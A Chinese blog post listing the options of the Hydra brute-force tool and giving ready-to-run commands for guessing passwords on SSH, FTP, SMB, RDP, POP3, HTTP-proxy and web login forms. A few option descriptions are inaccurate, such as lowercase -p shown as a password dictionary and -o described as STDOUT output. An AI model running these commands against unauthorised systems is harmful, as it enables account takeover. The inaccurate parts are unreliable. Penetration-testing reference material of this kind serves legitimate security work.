暴力破解工具Hydra 常用命令总结

暴力破解工具Hydra 常用命令总结

命令:

-R 修复之前使用的aborted/crashed session

-S 执行SSL(Secure Socket Layer)连接

-s Port 使用非默认服务器端口而是其他端口时,指定其端口

-l Login 已经获取登录ID的情况下输入登录ID

-L FILE 未获取登录ID情况下指定用于暴力破解的文件(需要指出全路径)

-p Pass 已经获取登录密码的情况下输入登录密码

-P FILE 未获取登录密码的情况下指定用于暴力破解的文件(需要指出全路径)

-x MIN:MAX:CHARSET 暴力破解时不指定文件,而生可以满足指定字符集和最短、最长长度条件的密码来尝试暴力破解

-C FILE 用于指定由冒号区分形式的暴力破解专用文件,即ID:Password形式

-M FILE指定实施并列攻击的文件服务器的目录文件

-o FILE以STDOUT的形式输出结果值

-f 查找到第一个可以使用的ID和密码的时候停止破解

-t TASKS 指定并列连接数(默认值:16)

-w 指定每个线程的回应时间(Waittime)(默认值:32秒)

-4/6 指定IPv4/IPv6(默认值:IPv4)

-v/-V 显示详细信息

-U 查看服务器组件使用明细

各协议爆破命令实例:

1、爆破SSH
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh
hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh

2、爆破FTP
hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV

3、爆破SMB
hydra -l administrator -P pass.txt 192.168.0.2 smb

4、爆破rdp
hydra ip rdp -l administrator -P pass.txt -V

5、爆破POP3
hydra -l muts -P pass.txt my.pop3.mail pop3

6、爆破http-proxy
hydra -l admin -P pass.txt http-proxy://192.168.0.2

7、爆破web表单
hydra -l 用户名 -P 密码字典 -s 80 域名 http-post-form"/admin/login.php:username=USER&password=PASS:<密码错误的时候的报错>"


版权声明:本文为weixin_51693574原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。